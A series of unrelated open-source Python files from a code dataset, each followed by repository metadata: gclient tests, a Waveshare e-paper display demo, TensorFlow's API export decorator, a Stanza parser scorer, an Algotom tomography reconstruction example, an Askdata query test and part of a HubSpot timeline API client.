('trunk/third_party/foo@1', 'foo/bar'))
self.assertTree(tree)
# TODO(maruel): This is incorrect.
out = self.parseGclient(['status', '--deps', 'mac'], [])
def testRunHooks(self):
if not self.enabled:
return
# Hooks aren't really tested for now since there is no hook defined.
self.gclient(['sync', '--deps', 'mac'])
out = self.parseGclient(['runhooks', '--deps', 'mac'], ['running'])
self.assertEquals(1, len(out))
self.assertEquals(2, len(out[0]))
self.assertEquals(3, len(out[0][0]))
self.checkString('foo', out[0][1])
tree = self.mangle_svn_tree(
('trunk/webkit@2', ''),
('trunk/third_party/foo@1', 'foo/bar'))
self.assertTree(tree)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
expected = (
'./: None\nfoo/bar: %strunk/third_party/foo@1\n' % self.svn_base,
'', 0)
self.check(expected, results)
# TODO(maruel): To be added after the refactor.
#results = self.gclient(['revinfo', '--snapshot'])
#expected = (
# './: None\nfoo/bar: %strunk/third_party/foo@1\n' % self.svn_base,
# '', 0)
#self.check(expected, results)
def testRest(self):
if not self.enabled:
return
self.gclient(['sync'])
# TODO(maruel): This is incorrect, it should run on ./ too.
self.parseGclient(
['cleanup', '--deps', 'mac', '--verbose', '--jobs', '1'],
[('running', join(self.root_dir, 'foo', 'bar'))])
self.parseGclient(
['diff', '--deps', 'mac', '--verbose', '--jobs', '1'],
[('running', join(self.root_dir, 'foo', 'bar'))])
if __name__ == '__main__':
if '-v' in sys.argv:
logging.basicConfig(level=logging.DEBUG)
if '-c' in sys.argv:
COVERAGE = True
sys.argv.remove('-c')
if os.path.exists('.coverage'):
os.remove('.coverage')
os.environ['COVERAGE_FILE'] = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'.coverage')
unittest.main()
| 40.142679 | 80 | 0.560477 |
91aa8f03fd9a324a332b3af3179b839e58af7bc2 | 3,028 | py | Python | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding:utf-8 -*-
import sys
import os
picdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'pic')
libdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'lib')
if os.path.exists(libdir):
sys.path.append(libdir)
import logging
from waveshare_epd import epd1in02
import time
from PIL import Image,ImageDraw,ImageFont
import traceback
logging.basicConfig(level=logging.DEBUG)
try:
logging.info("epd1in02 Demo")
epd = epd1in02.EPD()
logging.info("init and Clear")
epd.Init()
epd.Clear()
# Drawing on the image
logging.info("1.Drawing on the image...")
image = Image.new('1', (epd.height, epd.width), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
font = ImageFont.truetype(os.path.join(picdir, 'Font.ttc'), 24)
draw.text((5, 0), 'hello world', font = font, fill = 0)
draw.text((15, 40), u'微雪电子', font = font, fill = 0)
epd.Display(epd.getbuffer(image))
time.sleep(2)
image = Image.new('1', (epd.height, epd.width), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
draw.rectangle((20, 0, 100, 80), fill = 0)
draw.rectangle((22, 2, 98, 78), fill = 255)
draw.chord((22, 2, 98, 78), 0, 360, fill = 0)
draw.chord((24, 4, 96, 76), 0, 360, fill = 255)
draw.line((20, 0, 100, 80), fill = 0)
draw.line((20, 80, 100, 0), fill = 0)
epd.Display(epd.getbuffer(image))
time.sleep(2)
# read bmp file
logging.info("2.read bmp file...")
image = Image.open(os.path.join(picdir, '1in02.bmp'))
epd.Display(epd.getbuffer(image))
time.sleep(2)
# read bmp file on window
logging.info("3.read bmp file on window...")
image1 = Image.new('1', (epd.width, epd.height), 255) # 255: clear the frame
bmp = Image.open(os.path.join(picdir, '100x100.bmp'))
image1.paste(bmp, (0,0))
epd.Display(epd.getbuffer(image1))
time.sleep(2)
# # partial update
logging.info("4.show time...")
epd.Clear()
epd.Partial_Init()
time_image = Image.new('1', (epd.height, epd.width), 255)
time_draw = ImageDraw.Draw(time_image)
image_old = epd.getbuffer(time_image)
num = 0
while (True):
time_draw.rectangle((10, 10, 120, 50), fill = 255)
time_draw.text((10, 10), time.strftime('%H:%M:%S'), font = font, fill = 0)
newimage = time_image.crop([10, 10, 120, 50])
time_image.paste(newimage, (10,10))
epd.DisplayPartial(image_old, epd.getbuffer(time_image))
image_old = epd.getbuffer(time_image)
num = num + 1
if(num == 10):
break
logging.info("Clear...")
epd.Init()
epd.Clear()
logging.info("Goto Sleep...")
epd.Sleep()
time.sleep(3)
epd.Dev_exit()
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info("ctrl + c:")
epd1in54.epdconfig.module_exit()
exit()
| 29.398058 | 90 | 0.606671 |
2be4dbb28348e70aa8b0806f8ac5e722932114dc | 7,129 | py | Python | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for exporting TensorFlow symbols to the API.
Exporting a function or a class:
To export a function or a class use tf_export decorator. For e.g.:
```python
@tf_export('foo', 'bar.foo')
def foo(...):
...
```
If a function is assigned to a variable, you can export it by calling
tf_export explicitly. For e.g.:
```python
foo = get_foo(...)
tf_export('foo', 'bar.foo')(foo)
```
Exporting a constant
```python
foo = 1
tf_export("consts.foo").export_constant(__name__, 'foo')
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import sys
from tensorflow.python.util import tf_decorator
ESTIMATOR_API_NAME = 'estimator'
TENSORFLOW_API_NAME = 'tensorflow'
_Attributes = collections.namedtuple(
'ExportedApiAttributes', ['names', 'constants'])
# Attribute values must be unique to each API.
API_ATTRS = {
TENSORFLOW_API_NAME: _Attributes(
'_tf_api_names',
'_tf_api_constants'),
ESTIMATOR_API_NAME: _Attributes(
'_estimator_api_names',
'_estimator_api_constants')
}
API_ATTRS_V1 = {
TENSORFLOW_API_NAME: _Attributes(
'_tf_api_names_v1',
'_tf_api_constants_v1'),
ESTIMATOR_API_NAME: _Attributes(
'_estimator_api_names_v1',
'_estimator_api_constants_v1')
}
class SymbolAlreadyExposedError(Exception):
"""Raised when adding API names to symbol that already has API names."""
pass
def get_canonical_name_for_symbol(symbol, api_name=TENSORFLOW_API_NAME):
"""Get canonical name for the API symbol.
Canonical name is the first non-deprecated endpoint name.
Args:
symbol: API function or class.
api_name: API name (tensorflow or estimator).
Returns:
Canonical name for the API symbol (for e.g. initializers.zeros) if
canonical name could be determined. Otherwise, returns None.
"""
if not hasattr(symbol, '__dict__'):
return None
api_names_attr = API_ATTRS[api_name].names
_, undecorated_symbol = tf_decorator.unwrap(symbol)
if api_names_attr not in undecorated_symbol.__dict__:
return None
api_names = getattr(undecorated_symbol, api_names_attr)
# TODO(annarev): may be add a separate deprecated attribute
# for estimator names.
deprecated_api_names = undecorated_symbol.__dict__.get(
'_tf_deprecated_api_names', [])
return get_canonical_name(api_names, deprecated_api_names)
def get_canonical_name(api_names, deprecated_api_names):
"""Get first non-deprecated endpoint name.
Args:
api_names: API names iterable.
deprecated_api_names: Deprecated API names iterable.
Returns:
Canonical name if there is at least one non-deprecated endpoint.
Otherwise returns None.
"""
return next(
(name for name in api_names if name not in deprecated_api_names),
None)
class api_export(object): # pylint: disable=invalid-name
"""Provides ways to export symbols to the TensorFlow API."""
def __init__(self, *args, **kwargs):
"""Export under the names *args (first one is considered canonical).
Args:
*args: API names in dot delimited format.
**kwargs: Optional keyed arguments.
v1: Names for the TensorFlow V1 API. If not set, we will use V2 API
names both for TensorFlow V1 and V2 APIs.
overrides: List of symbols that this is overriding
(those overrided api exports will be removed). Note: passing overrides
has no effect on exporting a constant.
api_name: Name of the API you want to generate (e.g. `tensorflow` or
`estimator`). Default is `tensorflow`.
"""
self._names = args
self._names_v1 = kwargs.get('v1', args)
self._api_name = kwargs.get('api_name', TENSORFLOW_API_NAME)
self._overrides = kwargs.get('overrides', [])
def __call__(self, func):
"""Calls this decorator.
Args:
func: decorated symbol (function or class).
Returns:
The input function with _tf_api_names attribute set.
Raises:
SymbolAlreadyExposedError: Raised when a symbol already has API names
and kwarg `allow_multiple_exports` not set.
"""
api_names_attr = API_ATTRS[self._api_name].names
api_names_attr_v1 = API_ATTRS_V1[self._api_name].names
# Undecorate overridden names
for f in self._overrides:
_, undecorated_f = tf_decorator.unwrap(f)
delattr(undecorated_f, api_names_attr)
delattr(undecorated_f, api_names_attr_v1)
_, undecorated_func = tf_decorator.unwrap(func)
self.set_attr(undecorated_func, api_names_attr, self._names)
self.set_attr(undecorated_func, api_names_attr_v1, self._names_v1)
return func
def set_attr(self, func, api_names_attr, names):
# Check for an existing api. We check if attribute name is in
# __dict__ instead of using hasattr to verify that subclasses have
# their own _tf_api_names as opposed to just inheriting it.
if api_names_attr in func.__dict__:
raise SymbolAlreadyExposedError(
'Symbol %s is already exposed as %s.' %
(func.__name__, getattr(func, api_names_attr))) # pylint: disable=protected-access
setattr(func, api_names_attr, names)
def export_constant(self, module_name, name):
"""Store export information for constants/string literals.
Export information is stored in the module where constants/string literals
are defined.
e.g.
```python
foo = 1
bar = 2
tf_export("consts.foo").export_constant(__name__, 'foo')
tf_export("consts.bar").export_constant(__name__, 'bar')
```
Args:
module_name: (string) Name of the module to store constant at.
name: (string) Current constant name.
"""
module = sys.modules[module_name]
api_constants_attr = API_ATTRS[self._api_name].constants
api_constants_attr_v1 = API_ATTRS_V1[self._api_name].constants
if not hasattr(module, api_constants_attr):
setattr(module, api_constants_attr, [])
# pylint: disable=protected-access
getattr(module, api_constants_attr).append(
(self._names, name))
if not hasattr(module, api_constants_attr_v1):
setattr(module, api_constants_attr_v1, [])
getattr(module, api_constants_attr_v1).append(
(self._names_v1, name))
tf_export = functools.partial(api_export, api_name=TENSORFLOW_API_NAME)
estimator_export = functools.partial(api_export, api_name=ESTIMATOR_API_NAME)
| 32.852535 | 93 | 0.714827 |
39e559ad464e51382aa441e28dc64faf4ad42380 | 614 | py | Python | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 3,633 | 2016-01-21T17:29:13.000Z | 2022-03-31T13:36:47.000Z | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 593 | 2016-01-19T07:16:05.000Z | 2022-03-31T20:23:58.000Z | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 525 | 2016-01-20T03:22:19.000Z | 2022-03-24T05:51:56.000Z | """
Utils and wrappers for scoring parsers.
"""
import logging
from stanza.models.common.utils import ud_scores
logger = logging.getLogger('stanza')
def score(system_conllu_file, gold_conllu_file, verbose=True):
""" Wrapper for UD parser scorer. """
evaluation = ud_scores(gold_conllu_file, system_conllu_file)
el = evaluation['LAS']
p = el.precision
r = el.recall
f = el.f1
if verbose:
scores = [evaluation[k].f1 * 100 for k in ['LAS', 'MLAS', 'BLEX']]
logger.info("LAS\tMLAS\tBLEX")
logger.info("{:.2f}\t{:.2f}\t{:.2f}".format(*scores))
return p, r, f
| 26.695652 | 74 | 0.64658 |
a61970a309fff7615d387364e1d8d6d0b3e6efef | 5,725 | py | Python | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | # ===========================================================================
# ===========================================================================
# Copyright (c) 2021 Nghia T. Vo. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
# Author: Nghia T. Vo
# E-mail:
# Description: Examples of how to use the Algotom package.
# ===========================================================================
"""
The following examples show how to reconstruct a few slices of each frame
in a time-series tomography data.
The code written based on datasets collected at the beamline I12-DLS which
often have 4 files for each time-series scan:
- a hdf-file contains projection-images.
- a nxs-file contains metadata of an experiment: energy, number-of-projections
per tomo, number-of-tomographs, detector-sample distance, detector
pixel-size, exposure time,...
- a hdf-file contains flat-field images.
- a hdf-file contains dark-field images.
Referring to "example_01_*.py" to know how to find key-paths and datasets
in a hdf/nxs file.
"""
import timeit
import numpy as np
import algotom.io.loadersaver as losa
import algotom.prep.correction as corr
import algotom.prep.calculation as calc
import algotom.rec.reconstruction as reco
import algotom.prep.removal as remo
import algotom.prep.filtering as filt
import algotom.util.utility as util
start_slice = 10
stop_slice = -1
step_slice = 100
output_base = "/home/user_id/reconstruction/"
proj_path = "/i12/data/projections.hdf"
flat_path = "/i12/data/flats.hdf"
dark_path = "/i12/data/darks.hdf"
metadata_path = "/i12/data/metadata.nxs"
scan_type = "continuous" # stage is freely rotated
# scan_type = "swinging" # stage is restricted to rotate back-and-forward between 0 and 180 degree.
# Provide paths (keys) to datasets in the hdf/nxs files.
hdf_key = "/entry/data/data"
angle_key = "/entry1/tomo_entry/data/rotation_angle"
num_proj_key = "/entry1/information/number_projections"
# Crop images if need to.
crop_left = 0
crop_right = 0
data = losa.load_hdf(proj_path, hdf_key) # This is an hdf-object not ndarray.
(depth, height, width) = data.shape
left = crop_left
right = width - crop_right
if (stop_slice == -1) or (stop_slice > height - 1):
stop_slice = height - 1
# Load metatdata
num_proj = int(np.asarray(losa.load_hdf(metadata_path, num_proj_key)))
num_tomo = depth // num_proj
angles = np.squeeze(np.asarray(losa.load_hdf(metadata_path, angle_key)))
# Sometime there's a mismatch between the number of acquired projections
# and number of angles due to technical reasons or early terminated scan.
# In such cases, we have to provide calculated angles.
if len(angles) < depth:
if scan_type == "continuous":
list_tmp = np.linspace(0, 180.0, num_proj)
angles = np.ndarray.flatten(np.asarray([list_tmp for i in range(num_tomo)]))
else:
list_tmp1 = np.linspace(0, 180.0, num_proj)
list_tmp2 = np.linspace(180.0, 0, num_proj)
angles = np.ndarray.flatten(np.asarray(
[list_tmp1 if i % 2 == 0 else list_tmp2 for i in range(num_tomo)]))
else:
angles = angles[0:depth]
time_start = timeit.default_timer()
# Load flat-field images and dark-field images, average each of them
print("1 -> Load dark-field and flat-field images, average each result")
flat_field = np.mean(losa.load_hdf(flat_path, hdf_key)[:], axis=0)
dark_field = np.mean(losa.load_hdf(dark_path, hdf_key)[:], axis=0)
# Find the center of rotation using the sinogram of the first tomograph
mid_slice = height // 2
print("2 -> Calculate the center-of-rotation...")
sinogram = corr.flat_field_correction(data[0: num_proj, mid_slice, left:right],
flat_field[mid_slice, left:right],
dark_field[mid_slice, left:right])
center = calc.find_center_vo(sinogram)
print("Center-of-rotation = {0}".format(center))
for i in range(num_tomo):
folder_name = "tomo_" + ("0000" + str(i))[-5:]
thetas = np.deg2rad(angles[i * num_proj: (i + 1) * num_proj])
for slice_idx in range(start_slice, stop_slice + 1, step_slice):
sinogram = corr.flat_field_correction(data[i * num_proj: (i + 1) * num_proj, slice_idx, left:right],
flat_field[slice_idx, left:right],
dark_field[slice_idx, left:right])
sinogram = remo.remove_zinger(sinogram, 0.05, 1)
sinogram = remo.remove_all_stripe(sinogram, 3.0, 51, 17)
sinogram = filt.fresnel_filter(sinogram, 100)
# img_rec = reco.dfi_reconstruction(sinogram, center, angles=thetas, apply_log=True)
# img_rec = reco.gridrec_reconstruction(sinogram, center, angles=thetas, apply_log=True)
img_rec = reco.fbp_reconstruction(sinogram, center, angles=thetas, apply_log=True)
file_name = "rec_slice_" + ("0000" + str(slice_idx))[-5:] + ".tif"
losa.save_image(output_base + "/" + folder_name + "/" + file_name, img_rec)
print("Done tomograph {0}".format(i))
time_stop = timeit.default_timer()
print("All done!!! Total time cost: {}".format(time_stop - time_start))
| 43.70229 | 108 | 0.669869 |
1e311cf4663842248c4cc4f8d7b1fd2c6ea4f902 | 2,226 | py | Python | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | from askdata import human2query
from askdata.smartquery import SmartQuery, Query, Field, Condition, Sorting, SQLSorting, SQLOperator, TimeOperator, \
BooleanOperator, CompositeCondition
if __name__ == "__main__":
# Query2SQL
smartquery = SmartQuery(
queries=[
Query(
fields=[
Field(aggregation="SUM", column="incidents", alias="sum_incidents",
internalDataType="NUMERIC",
sourceDataType="INT64"),
Field(column="customer_name", alias="Customer",
internalDataType="STRING",
sourceDataType="VARCHAR"),
Field(aggregation="YEAR", column="acquired", alias="Acquired Date",
internalDataType="DATE",
sourceDataType="DATE")
],
where=[
CompositeCondition(conditions=[
Condition(field=Field(column="customer_name", alias="Customer",
internalDataType="STRING",
sourceDataType="VARCHAR"), operator=SQLOperator.IN,
value=["Franceaco Doe", "Claude Rudolf"]),
Condition(field=Field(aggregation="YEAR", column="acquired", alias="Acquired Date",
internalDataType="DATE",
sourceDataType="DATE"), operator=TimeOperator.RANGE,
value=["2018-01-01", "2019-12-31"])
], operator=BooleanOperator.AND)
],
orderBy=[
Sorting(field="Acquired Date", order=SQLSorting.DESC)
],
limit=6
)
]
)
response = human2query.query2sql(smartquery=smartquery, driver="MySQL")
print(response)
response = human2query.complex_field_calculator(smartquery=smartquery, driver="MySQL")
print(response)
response = human2query.complex_filter_calculator(smartquery=smartquery, driver="MySQL")
print(response)
| 45.428571 | 117 | 0.512129 |
f9beb2e0a529e7736a66a6c3f105bb989b50d5b6 | 32,479 | py | Python | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 117 | 2020-04-06T08:22:53.000Z | 2022-03-18T03:41:29.000Z | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 62 | 2020-04-06T16:21:06.000Z | 2022-03-17T16:50:44.000Z | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 45 | 2020-04-06T16:13:52.000Z | 2022-03-30T21:33:17.000Z | # coding: utf-8
"""
Timeline events
This feature allows an app to create and configure custom events that can show up in the timelines of certain CRM objects like contacts, companies, tickets, or deals. You'll find multiple use cases for this API in the sections below. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from hubspot.crm.timeline.api_client import ApiClient
from hubspot.crm.timeline.exceptions import ApiTypeError, ApiValueError # noqa: F401
class TemplatesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def archive(self, event_template_id, app_id, **kwargs): # noqa: E501
"""Deletes an event template for the app # noqa: E501
This will delete the event template. All associated events will be removed from search results and the timeline UI. This action can't be undone, so it's highly recommended that you stop using any associated events before deleting a template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive(event_template_id, app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.archive_with_http_info(event_template_id, app_id, **kwargs) # noqa: E501
def archive_with_http_info(self, event_template_id, app_id, **kwargs): # noqa: E501
"""Deletes an event template for the app # noqa: E501
This will delete the event template. All associated events will be removed from search results and the timeline UI. This action can't be undone, so it's highly recommended that you stop using any associated events before deleting a template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive_with_http_info(event_template_id, app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["event_template_id", "app_id"]
all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method archive" % key)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'event_template_id' is set
if self.api_client.client_side_validation and ("event_template_id" not in local_var_params or local_var_params["event_template_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `event_template_id` when calling `archive`") # noqa: E501
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `archive`") # noqa: E501
collection_formats = {}
path_params = {}
if "event_template_id" in local_var_params:
path_params["eventTemplateId"] = local_var_params["event_template_id"] # noqa: E501
if "app_id" in local_var_params:
path_params["appId"] = local_var_params["app_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(["*/*"]) # noqa: E501
# Authentication setting
auth_settings = ["developer_hapikey"] # noqa: E501
return self.api_client.call_api(
"/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def create(self, app_id, timeline_event_template_create_request, **kwargs): # noqa: E501
"""Create an event template for your app # noqa: E501
Event templates define the general structure for a custom timeline event. This includes formatted copy for its heading and details, as well as any custom property definitions. The event could be something like viewing a video, registering for a webinar, or filling out a survey. A single app can define multiple event templates. Event templates will be created for contacts by default, but they can be created for companies, tickets, and deals as well. Each event template contains its own set of tokens and `Markdown` templates. These tokens can be associated with any CRM object properties via the `objectPropertyName` field to fully build out CRM objects. You must create an event template before you can create events. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create(app_id, timeline_event_template_create_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param TimelineEventTemplateCreateRequest timeline_event_template_create_request: The new event template definition. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TimelineEventTemplate
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.create_with_http_info(app_id, timeline_event_template_create_request, **kwargs) # noqa: E501
def create_with_http_info(self, app_id, timeline_event_template_create_request, **kwargs): # noqa: E501
"""Create an event template for your app # noqa: E501
Event templates define the general structure for a custom timeline event. This includes formatted copy for its heading and details, as well as any custom property definitions. The event could be something like viewing a video, registering for a webinar, or filling out a survey. A single app can define multiple event templates. Event templates will be created for contacts by default, but they can be created for companies, tickets, and deals as well. Each event template contains its own set of tokens and `Markdown` templates. These tokens can be associated with any CRM object properties via the `objectPropertyName` field to fully build out CRM objects. You must create an event template before you can create events. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_with_http_info(app_id, timeline_event_template_create_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param TimelineEventTemplateCreateRequest timeline_event_template_create_request: The new event template definition. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["app_id", "timeline_event_template_create_request"]
all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method create" % key)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `create`") # noqa: E501
# verify the required parameter 'timeline_event_template_create_request' is set
if self.api_client.client_side_validation and (
"timeline_event_template_create_request" not in local_var_params or local_var_params["timeline_event_template_create_request"] is None # noqa: E501
): # noqa: E501
raise ApiValueError("Missing the required parameter `timeline_event_template_create_request` when calling `create`") # noqa: E501
collection_formats = {}
path_params = {}
if "app_id" in local_var_params:
path_params["appId"] = local_var_params["app_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "timeline_event_template_create_request" in local_var_params:
body_params = local_var_params["timeline_event_template_create_request"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(["application/json", "*/*"]) # noqa: E501
# HTTP header `Content-Type`
header_params["Content-Type"] = self.api_client.select_header_content_type(["application/json"]) # noqa: E501 # noqa: E501
# Authentication setting
auth_settings = ["developer_hapikey"] # noqa: E501
return self.api_client.call_api(
"/crm/v3/timeline/{appId}/event-templates",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="TimelineEventTemplate", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_all(self, app_id, **kwargs): # noqa: E501
"""List all event templates for your app # noqa: E501
Use this to list all event templates owned by your app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CollectionResponseTimelineEventTemplateNoPaging
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_all_with_http_info(app_id, **kwargs) # noqa: E501
def get_all_with_http_info(self, app_id, **kwargs): # noqa: E501
"""List all event templates for your app # noqa: E501
Use this to list all event templates owned by your app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
